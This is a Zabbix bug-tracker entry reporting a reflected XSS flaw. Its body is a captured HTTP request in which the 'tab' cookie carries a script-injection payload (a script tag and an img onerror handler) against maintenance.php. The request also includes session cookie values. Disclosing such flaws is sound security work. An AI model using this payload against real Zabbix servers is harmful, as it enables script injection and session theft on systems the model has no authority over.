  1. ZABBIX BUGS AND ISSUES
  2. ZBX-11285

actionconf.php has Reflective XSS

    • Team A
    • Sprint 3, Sprint 4, Sprint 5, Sprint 6, Sprint 7, Sprint 8
    • 0.2

      POST /*****/maintenance.php HTTP/1.1
      Host: *****:18443
      Connection: keep-alive
      Cache-Control: max-age=0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Origin: https://*****:18443
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
      Content-Type: application/x-www-form-urlencoded
      Referer: https://*****:18443/*****/maintenance.php?form=Create+maintenance+period
      Accept-Language: zh-CN,zh;q=0.8
      Cookie: PHPSESSID=2l9kk6isfjdp1d795magb11aaf4ekrhr; zbx_sessionid=f9d1db7e92d49fd7f459a371d3dfa4f7;cb_maintenance_parts=0;tab=,//})// ]]><script>alert('xss')</script><img src=1 onerror=alert('xss')><!--
      Content-Length: 398

      sid=24230519c556deb5&form_refresh=1&form=Create+maintenance+period&active_since=1467216000&active_till=1467302400&mname=&maintenance_type=0&active_since_day=30&active_since_month=06&active_since_year=2016&active_since_hour=00&active_since_minute=00&active_till_day=01&active_till_month=07&active_till_year=2016&active_till_hour=00&active_till_minute=00&description=&new_timeperiod=New&twb_groupid=5

            Unassigned Unassigned
            chenyy cyy
            Team A